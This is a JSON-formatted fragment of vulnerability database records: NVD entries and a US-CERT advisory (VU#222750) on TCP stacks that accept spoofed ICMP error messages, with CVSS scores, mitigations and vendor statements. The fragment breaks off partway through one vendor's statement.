{"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:sun:sunos:5.8:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2003_server:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_98:*:gold:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_me:*:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp2:tablet_pc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp3:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:64-bit:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_2000:*:sp4:*:fr:*:*:*:*", "cpe:2.3:o:microsoft:windows_98se:*:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:9.0:*:sparc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:sp1:tablet_pc:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_xp:*:*:64-bit:*:*:*:*:*", "cpe:2.3:o:sun:solaris:10.0:*:sparc:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:45:53", "description": "Multiple TCP/IP and ICMP implementations allow remote attackers to cause a denial of service (network throughput reduction for TCP connections) via a blind throughput-reduction attack using spoofed Source Quench packets, aka the \"ICMP Source Quench attack.\" NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. 
While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2005-04-12T04:00:00", "type": "cve", "title": "CVE-2004-0791", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/o:sun:sunos:5.8", "cpe:/o:sun:solaris:9.0", "cpe:/o:sun:solaris:10.0", "cpe:/o:sun:sunos:5.7"], "id": "CVE-2004-0791", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0791", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:o:sun:sunos:5.8:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:9.0:*:sparc:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:10.0:*:sparc:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:29:10", "description": "The original design of TCP does not check that the TCP sequence number in an ICMP error message is within the range of sequence numbers for data that has been sent but not acknowledged (aka \"TCP sequence number checking\"), which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged \"Destination Unreachable\" messages, (2) blind 
throughput-reduction attacks with forged \"Source Quench\" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2005-05-02T04:00:00", "type": "cve", "title": "CVE-2005-0065", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2008-09-05T20:45:00", "cpe": ["cpe:/a:tcp:tcp:*"], "id": "CVE-2005-0065", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0065", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:tcp:tcp:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:29:12", "description": "The original design of TCP does not require that port numbers be assigned randomly (aka \"Port randomization\"), which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind 
connection-reset attacks with forged \"Destination Unreachable\" messages, (2) blind throughput-reduction attacks with forged \"Source Quench\" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2004-12-22T05:00:00", "type": "cve", "title": "CVE-2005-0067", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2008-09-05T20:45:00", "cpe": ["cpe:/a:tcp:tcp:*"], "id": "CVE-2005-0067", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0067", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:tcp:tcp:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:29:12", "description": "The original design of TCP does not check that the TCP Acknowledgement number in an ICMP error message generated by an intermediate router is within the range of possible values for data that has 
already been acknowledged (aka \"TCP acknowledgement number checking\"), which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged \"Destination Unreachable\" messages, (2) blind throughput-reduction attacks with forged \"Source Quench\" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2004-12-22T05:00:00", "type": "cve", "title": "CVE-2005-0066", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2008-09-05T20:45:00", "cpe": ["cpe:/a:tcp:tcp:*"], "id": "CVE-2005-0066", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0066", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:tcp:tcp:*:*:*:*:*:*:*:*"]}, {"lastseen": 
"2022-03-23T11:29:14", "description": "The original design of ICMP does not require authentication for host-generated ICMP error messages, which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged \"Destination Unreachable\" messages, (2) blind throughput-reduction attacks with forged \"Source Quench\" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities.", "cvss3": {}, "published": "2004-12-22T05:00:00", "type": "cve", "title": "CVE-2005-0068", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2004-0790", "CVE-2004-0791", "CVE-2004-1060", "CVE-2005-0065", "CVE-2005-0066", "CVE-2005-0067", "CVE-2005-0068"], "modified": "2008-09-05T20:45:00", "cpe": ["cpe:/a:tcp:tcp:*"], "id": "CVE-2005-0068", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0068", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, 
"cpe23": ["cpe:2.3:a:tcp:tcp:*:*:*:*:*:*:*:*"]}], "cert": [{"lastseen": "2021-09-28T17:52:39", "description": "### Overview\n\nMultiple TCP/IP implementations do not adequately validate ICMP error messages. A remote attacker could cause TCP connections to drop or be degraded using spoofed ICMP error messages.\n\n### Description\n\nA number of widely accepted Internet standards describe different aspects of the relationships between the Internet Control Message Protocol (ICMP) and Transmission Control Protocol (TCP). In particular, [RFC 1122](<http://www.ietf.org/rfc/rfc1122.txt>) explains how TCP should respond to ICMP messages:\n\n```\n4.2.3.9 ICMP Messages\n\n   TCP MUST act on an ICMP error message passed up from the IP layer, directing it to the connection that created the error. The necessary demultiplexing information can be found in the IP header contained within the ICMP message.\n\n   o Source Quench\n     TCP MUST react to a Source Quench by slowing transmission on the connection. The RECOMMENDED procedure is for a Source Quench to trigger a \"slow start,\" as if a retransmission timeout had occurred.\n\n   o Destination Unreachable -- codes 0, 1, 5\n     Since these Unreachable messages indicate soft error conditions, TCP MUST NOT abort the connection, and it SHOULD make the information available to the application.\n\n     DISCUSSION:\n     TCP could report the soft error condition directly to the application layer with an upcall to the ERROR_REPORT routine, or it could merely note the message and report it to the application only when and if the TCP connection times out.\n\n   o Destination Unreachable -- codes 2-4\n     These are hard error conditions, so TCP SHOULD abort the connection.\n\n   o Time Exceeded -- codes 0, 1\n     This should be handled the same way as Destination Unreachable codes 0, 1, 5 (see above).\n\n   o Parameter Problem\n     This should be handled the same way as Destination Unreachable codes 0, 1, 5 (see above).\n```\n
\nAn ICMP message contains the IP header and the first 8 bytes of the transport layer (TCP) segment that caused the error condition (this covers IP and TCP header information). In order to match an ICMP message to a TCP connection, TCP stack implementations generally match the source and destination TCP port and IP address four-tuple from the data returned in the ICMP message. An attacker who knows or can guess this four-tuple can create spoofed ICMP messages. By setting ICMP types and codes to indicate hard or soft error conditions, the attacker may be able to cause valid TCP connections to be reset or degraded. An attacker may also be able to take advantage of path MTU discovery functionality by spoofing ICMP type 3 (Destination Unreachable) code 4 (Fragmentation Needed but Don't Fragment Bit Set) messages and lowering the MTU for a connection (this is described in section 8 of RFC 1191). \n \nNote that any protocols that use path MTU discovery and state-based transport layer protocols other than TCP could also be affected. \n \nFurther details about this vulnerability are available in an IETF Internet Draft titled \"ICMP attacks against TCP\" authored by [Fernando Gont](<http://www.gont.com.ar/drafts/icmp-attacks-against-tcp.html>). \n \n--- \n \n### Impact\n\nA remote attacker could cause TCP connections to drop or be degraded using spoofed ICMP error messages. Applications that depend on long-lived, low latency, or high throughput TCP connections may not function correctly on a degraded TCP connection. In order to spoof an ICMP message, an attacker would need to know or guess the source and destination TCP port and IP address four-tuple. 
The Border Gateway Protocol (BGP) is of particular concern since it relies on long-lived TCP connections ([VU#415294](<http://www.kb.cert.org/vuls/id/415294>)), uses well-known source and destination ports, provides critical network and Internet routing information, and may require a non-trivial period of time to recover from a sustained attack. \n \n--- \n \n### Solution\n\n**Upgrade or apply a patch** \nUpgrade or apply a patch according to vendor instructions. Note that changes made by upgrades or patches may not completely defend against spoofed ICMP attacks. Consult vendor documentation for information on changes to ICMP message handling. Consider the general and attack-specific countermeasures discussed in the Gont I-D. Some of the countermeasures include validating TCP sequence and acknowledgement numbers contained in ICMP messages, improving TCP ephemeral port number randomization, changing the response to or ignoring certain ICMP messages, and delaying connection resets. Note that different countermeasures have different constraints and may negatively impact TCP operations. \n \n**Filter ICMP messages** \n \nFilter ICMP messages based on type and code at network borders. Allow only ICMP messages that are necessary for proper operation. \n \n**IPsec and TCP MD5** \n \nNote that TCP MD5 does not provide authentication for ICMP messages. Current IPsec specifications do not define how IPsec implementations should handle ICMP messages destined for authenticated TCP connections. \n \n--- \n \n### Vendor Information\n\n222750\n\n
### Alcatel __ Affected\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Allied Telesyn International __ Affected\n\nUpdated: April 29, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nFor customers in Japan, Allied Telesis K.K. which is a member of AT-Group has published a statement only for Japanese market. Please visit the following web sites. \n\n\n \n<http://jvn.jp/niscc/532967/522154/index.html> (Japanese) \n<http://www.allied-telesis.co.jp/support/list/faq/vuls/vulsall.html> (Japanese) \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Cisco Systems, Inc. 
__ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.cisco.com/warp/public/707/cisco-sa-20050412-icmp.shtml>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Extreme Networks __ Affected\n\nNotified: August 12, 2004 Updated: April 21, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nExtreme Networks products running \"Extremeware 7.x\" software are vulnerable to this issue. Extreme Networks products running \"Extremeware EXOS\" software are not vulnerable.\n\nWorkaround: Apply filter to block ICMP packets with specific type/code which can cause the attack. \n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### F5 Networks, Inc. __ Affected\n\nNotified: August 12, 2004 Updated: May 03, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nF5 products BIG-IP 4.x and 9.x are vulnerable. Patches are being made ready. 
TrafficShield and FirePass are not vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nFurther information is available in Secunia Advisory [SA15205](<http://secunia.com/advisories/15205/>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Hewlett-Packard Company __ Affected\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSOURCE: Hewlett-Packard Company Software Security Response Team\n\nx-ref: SSRT4884 \n \nHP is investigating the potential impact to HP's products. \n \nAs further information becomes available HP will provide notice through standard security bulletin announcements. \n \nTo report potential security vulnerabilities in HP software, send an E-mail message to [security-alert@hp.com](<mailto:security-alert@hp.com>).\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see HPSBUX01164/SSRT4884 (HP-UX) and HPSBTU01210/SSRT4743 (HP Tru64 UNIX).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Hitachi __ Affected\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\n[[VULNERABLE]\n\nHitachi GR2000/GR4000/GS4000/GS3000 are vulnerable to this issue. More details are available at <<http://www.hitachi.co.jp/Prod/comp/network/notice/NISCC-532967.html>> (Japanese).] 
\n \n[NOT VULNERABLE] \nAlaxala AX series are NOT vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en> and <http://jvn.jp/niscc/532967/index.html> (Japanese).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### IBM Corporation __ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe AIX Operating System is affected by the issues discussed in CERT Vulnerability note VU#222750 and NISCC vulnerability #432967. An advisory for this issue will be available via <https://techsupport.services.ibm.com/server/pseries.subscriptionSvcs>\n\nFor information related to this and other published CERT Advisories that may relate to the IBM eServer Platforms (xSeries, iSeries, pSeries, and zSeries) please go to [https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/securityalerts?OpenDocument&pathID=](<https://app-06.www.ibm.com/servers/resourcelink/lib03020.nsf/pages/securityalerts?OpenDocument&pathID=>) \n \nIn order to access this information you will require a Resource Link ID. To subscribe to Resource Link go to <http://app-06.www.ibm.com/servers/resourcelink> and follow the steps for registration. \n \nAll questions should be referred to servsec@us.ibm.com.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Juniper Networks, Inc. 
__ Affected\n\nNotified: August 12, 2004 Updated: May 05, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nJuniper Networks M-series and T-series routers running software built prior to August 18, 2004, are susceptible to this vulnerability. Software built on or after that date disables processing of ICMP Source Quench messages, permits the user to disable Path MTU Discovery, and has additional verification enabled for PMTUD. The various forms of ICMP Unreachable messages are already ignored except during session establishment.\n\nOther Juniper Networks products are not susceptible to this vulnerability. Customers should visit the Juniper Networks Customer Service Center web-site for further information: \n\n\n<http://www.juniper.net/customers/csc>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en> and <https://www.juniper.net/customers/csc>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Microsoft Corporation __ Affected\n\nNotified: August 12, 2004 Updated: April 29, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see Microsoft Security Bulletin [MS05-019](<http://www.microsoft.com/technet/security/bulletin/MS05-019.mspx>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Netfilter __ Affected\n\nNotified: August 12, 2004 Updated: April 29, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe Linux kernel TCP/IP implementation has 
always been verifying the TCP sequence number embedded into the ICMP packet, and Linux end hosts are thus not affected by this vulnerability.\n\nAs for non-Linux machines protected by a netfilter/iptables firewall: netfilter/iptables did not implement TCP sequence number (aka window) tracking at all until linux-2.6.9. \n \nHowever, even in linux >= 2.6.9, the check for RELATED ICMP packets does not verify the tcp sequence number of the encapsulated packet. \n \nImplementation of such a check is scheduled for inclusion into the 2.6.11 linux kernel.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Network Appliance __ Affected\n\nNotified: August 12, 2004 Updated: April 11, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe Data ONTAP operating system has historically implemented some, but not all, of the recommendations from <http://www.ietf.org/internet-drafts/draft-gont-tcpm-icmp-attacks-03.txt>\n\nNetApp has implemented the remaining recommendations under bug ID 138865. Customers may, as always, check bug status and download patches from <http://now.netapp.com/>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Nortel Networks, Inc. 
__ Affected\n\nNotified: August 12, 2004 Updated: September 08, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see Nortel Technical Bulletins [2005005697](<http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?level=6&category=8&subcategory=7&subtype=&DocumentOID=326515&RenditionID=REND304870>), [2005005700](<http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?level=6&category=8&subcategory=7&subtype=&DocumentOID=320082&RenditionID=REND323461>), and [2005005701](<http://www130.nortelnetworks.com/cgi-bin/eserv/cs/main.jsp?level=6&category=8&subcategory=7&subtype=&DocumentOID=320119&RenditionID=REND266149>) on the Nortel [Security Advisory Bulletins](<http://www.nortel.com/securityadvisories>) site.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### OpenBSD __ Affected\n\nNotified: August 12, 2004 Updated: April 21, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [027: RELIABILITY FIX: August 25, 2004](<http://www.openbsd.org/errata34.html#icmp>) for OpenBSD 3.4 and [015: RELIABILITY FIX: August 25, 2004](<http://www.openbsd.org/errata35.html#icmp>) for OpenBSD 3.5.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Red Hat, Inc. 
__ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nCAN-2004-0790: A blind TCP connection reset\n\nRed Hat Enterprise Linux 2.1 and 3 kernels have always verified the TCP sequence number on ICMP errors. In addition, Linux kernels will never abort a connection due to a received ICMP packet. All Red Hat Enterprise Linux versions are therefore unaffected by this issue. \n \nCAN-2004-0791: A spoofing attack with ICMP type 4 header \n \nRed Hat Enterprise Linux 2.1 and 3 kernels prior to January 2005 honour ICMP Source Quench messages, although the TCP sequence number is checked, which substantially increases the amount of effort an attacker would need to be able to cause a successful attack. ICMP Source Quench messages were disabled completely by the following updates: \n\n\n<http://rhn.redhat.com/errata/RHSA-2005-043.html> \n<http://rhn.redhat.com/errata/RHSA-2005-016.html> \n<http://rhn.redhat.com/errata/RHSA-2005-017.html> \n\nCAN-2004-1060: ICMP path MTU spoofing \n \nRed Hat Enterprise Linux 2.1 and 3 kernels verify the sequence number on ICMP errors, thus significantly mitigating this issue. This issue can also be mitigated by disabling pmtu discovery if not required (/proc/sys/net/ipv4/ip_no_pmtu_disc) \n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see <http://www.niscc.gov.uk/niscc/docs/re-20050412-00303.pdf?lang=en>.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Redback Networks Inc. 
__ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nLike most TCP implementations, both product lines of Redback Networks, the Subscriber Management System and the SmartEdge Router Family, are affected by this vulnerability.\n\nThe fixes will be available on both platforms in upcoming releases. \n \nFor further assistance regarding this topic, contact the Redback Networks Technical Assistance Center (TAC). TAC is prepared to provide worldwide support for security workarounds that address this issue. The Redback domestic TAC number is (877) 733 2225 and the International TAC phone number is 31-104987777. Redback TAC will provide detailed information to our worldwide systems engineers and focal engineers to assist customers in configuring these workarounds.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### SCO __ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSCO is aware of the issue and is working on a fix.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nFor UnixWare 7.1.4 the fix is included in maintenance pack 2:\n\n<http://www.sco.com/support/update/download/release.php?rid=58>\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Sun Microsystems, Inc. 
__ Affected\n\nNotified: August 12, 2004 Updated: April 12, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nSun is only marginally impacted by the issues described in Gont's ICMP Internet Draft as existing TCP connections will not be dropped. There may be a performance impact but no more or less than flooding any link or system with garbage messages will cause performance problems. Sun is issuing Sun Alert 57746 to further describe Sun's specific impact and details which will be available here:\n\n<http://sunsolve.sun.com/search/document.do?assetkey=1-26-57746-1>\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nUS-CERT has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### Symantec Corporation __ Affected\n\nNotified: August 12, 2004 Updated: May 03, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nPlease see [SYM05-008](<http://securityresponse.symantec.com/avcenter/security/Content/2005.05.02.html>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23222750 Feedback>).\n\n### WatchGuard __ Affected\n\nNotified: August 12, 2004 Updated: April 11, 2005 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAll WatchGuard firewalls are impacted to some extent by Gont's findings. TCP sessions which terminate on or pass through the firewall are vulnerable to reset attacks when the attacker can guess the source and destination address and port combinations for that session. 
